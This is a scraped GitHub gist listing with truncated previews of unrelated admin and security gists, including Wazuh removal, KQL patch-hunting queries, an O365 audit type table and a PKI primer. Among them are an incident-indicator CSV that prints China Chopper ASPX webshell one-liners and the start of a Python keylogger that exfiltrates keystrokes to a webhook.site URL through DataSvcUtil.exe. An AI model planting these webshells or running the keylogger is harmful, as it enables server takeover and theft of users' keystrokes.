Austin Songer, CISSP austinsonger
@bashtheshell
bashtheshell / slack_app_installer_homedir_macOS.md
Last active December 15, 2023 18:51
Install Slack app in User's ~/Applications directory - macOS

Install Slack app in User's Applications Directory - macOS

Background

This work was inspired by the challenges I encountered in the workplace. I manage several macOS remotely, and one of the biggest pains is that our users aren't administrators on those machines. Thus, they aren't able to dismiss the Squirrel Update prompts on their own, which was a productivity hindrance.

Initially as a fun side-project to satisfy my curiosity, I came up with a solution to mitigate this by having the Slack app, which was already installed in the main /Applications directory, automatically update itself as soon as the Launch Daemon script fetches a new update from slack.com. The script would notify all users actively using Slack that the app would restart itself in several seconds.

Admittedly, the above solution wasn't organic and understandably it can be a grave security concern for some. The only upside of

@austinsonger
austinsonger / wazuhremove.sh
Last active March 21, 2023 21:43
Completely Remove Wazuh - opendistroforelasticsearch
#! /bin/bash
# Email : [email protected]
# Website : https://songer.pro
# Wazuh
# ------------------------------#
# UBUNTU 18.04, 20.04
# ------------------------------#
clear
echo -e "[>>] ----------------------------------------------------------- [<<]"
@alexverboon
alexverboon / huntsecurityupdates.kql
Created March 19, 2021 10:25
Hunt for missing patches
let all_windows10_devices = DeviceInfo
| where isnotempty( OSArchitecture)
| extend WinVersion = case(
OSBuild == "19041","2004",
OSBuild == "19042","20H2",
OSBuild == "18363","1909",
OSBuild == "18362","1903",
OSBuild == "17763","1809",
OSBuild == "17134","1803",
OSBuild == "16299","1709",
@JohnHammond
JohnHammond / china_chopper_webshells.csv
Last active November 17, 2024 10:49
Microsoft Exchange Incident "China Chopper" ASPX Webshell filenames
# Occurrences Webshell Filename WebShell Syntax
46 C:\inetpub\wwwroot\aspnet_client\supp0rt.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script>
35 C:\inetpub\wwwroot\aspnet_client\discover.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>
21 C:\inetpub\wwwroot\aspnet_client\shell.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["gttkomomo"],"unsafe");}</script>
13 C:\inetpub\wwwroot\aspnet_client\HttpProxy.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script>
8 C:\inetpub\wwwroot\aspnet_client\0QWYSEXe.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["XOrSeMr3kgWUdFf6"],"unsafe");}</script>
7 C:\inetpub\wwwroot\aspnet_client\system_web\error.aspx http://f/<script language=
@alexverboon
alexverboon / mde2sentinel.kql
Created February 22, 2021 18:28
MDE Data Ingestion to Sentinel
// The query below estimates the average size in MB per client sent from Microsoft Defender for Endpoint to Azure Sentinel when using the M365 Defender connector
// The calculation is done as follows:
// 1. Collect the usage data for the specified table from the Usage table, for example 'DeviceFileEvents'
// 2. Collect the total number of devices that submitted information into the specified table, for example 'DeviceFileEvents'
// 3. Divide the total BillableDataGB per DataType by the total number of devices that sent data to get the average MB sent per client
// 4. Finally, 'union' all tables
let xagotime = 32d;
let xstarttime = 31d;
// File Events
@austinsonger
austinsonger / o365m-api.txt
Created February 12, 2021 19:36
Office 365 Management API - AuditLogRecordType
AuditLogRecordType
Value Member name Description
1 ExchangeAdmin Events from the Exchange admin audit log.
2 ExchangeItem Events from an Exchange mailbox audit log for actions that are performed on a single item, such as creating or receiving an email message.
3 ExchangeItemGroup Events from an Exchange mailbox audit log for actions that can be performed on multiple items, such as moving or deleting one or more email messages.
4 SharePoint SharePoint events.
6 SharePointFileOperation SharePoint file operation events.
7 OneDrive OneDrive for Business events.
8 AzureActiveDirectory Azure Active Directory events.
@alexverboon
alexverboon / win10versiondistribution.kql
Created January 26, 2021 23:25
KQL_Windows10versiondistribution
// Windows 10 versions https://docs.microsoft.com/en-us/windows/release-information/
DeviceInfo
| where isnotempty( OSPlatform) and OSPlatform == "Windows10"
| summarize arg_max(Timestamp,*) by DeviceId
| extend Version = case(
OSBuild == "19041","2004",
OSBuild == "19042","20H2",
OSBuild == "18363","1909",
OSBuild == "18362","1903",
OSBuild == "17763","1809",
@austinhyde
austinhyde / README.md
Last active September 5, 2022 03:23
Run Script, with dev docker image

One of the biggest barriers to starting in an unfamiliar repo is understanding how to start up the development environment, build the code, and other common tasks. Once a developer is established in a codebase, it's important to minimize development friction with common tasks.

The run script here is a very minimal script that makes it easy to see how to get started, what common tasks are available, and automates those tasks, no matter how trivial. Importantly for long-term maintainability, it allows the "repo maintainers" to change details about, say, starting a dev database, without most other engineers needing to care how that gets done (maybe we use docker-compose, maybe we use raw docker, maybe vagrant). And if they do care, they can just read the script or watch its output.

Importantly, the script is just plain old bash. Most developers are probably familiar with the syntax, and it's ubiquitous, meaning there are no dependencies to install and no esoteric shell-like syntaxes (like make) or librarie

PKI for busy people

Public-key infrastructure (PKI) is an umbrella term for everything that has to do with keys and certificates.

This is a quick overview of the important stuff.

Public-key cryptography

Public-key cryptography involves a key pair: a public key and a private key. Each entity has their own. The public key can be shared around, the private key is secret.

@teixeira0xfffff
teixeira0xfffff / DataSvcUtil.py
Created December 2, 2020 01:54
Data exfil with DataSvcUtil.exe
# From: https://github.com/moses-palmer/pynput
from pynput.keyboard import Key, Listener
import os
import sys
import subprocess
URL = 'https://webhook.site/xxxxxx-xxxxx-xxxx-xxxxx-xxxxxxx'
uploader = "C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe"
content = ""
def on_press(key):
global content